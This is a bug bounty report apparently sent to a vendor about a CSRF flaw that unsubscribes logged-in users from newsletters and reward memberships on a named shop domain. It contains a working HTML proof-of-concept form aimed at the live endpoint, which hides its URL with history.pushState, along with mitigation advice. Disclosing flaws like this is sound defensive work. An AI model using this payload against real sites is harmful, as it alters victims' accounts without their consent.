Hello, Team
While testing on your main domain I discovered a CSRF attack which leads to unsubscribing victims from Communication/Reward Membership. This is more like an in-depth security issue with a reasonable attack scenario.
Description:
It is possible to unsubscribe a logged-in user from any subscribed events. The unsubscribe is done by a GET call, which is (of course) not protected by an anti-CSRF token. It would be very easy to make an attack page including all events and unsubscribe all users. The same CSRF HTML code can also be used to subscribe and unsubscribe all users from your specific activities.
Steps To Reproduce:
<html>
  <body>
    <!-- Hide the PoC URL from the address bar while the page loads -->
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the form is submitted with GET -->
    <form action="https://shop.resmed.com/GB/en/my-account/update-subscriptions">
      <input type="hidden" name="changeType" value="changeNewsletterSubscription" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Mitigation:
Do not use the GET method for any operation that changes state. Next, add an anti-forgery token to this endpoint, as is already present elsewhere on the site.
Supporting Material/References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Please feel free to ask if you need a PoC video, though I think the steps to reproduce are enough for reproducing the issue.
Regards,
Pranav_PranayX01
Impact:
An attacker is able to unsubscribe the victim from Communication and Reward Memberships.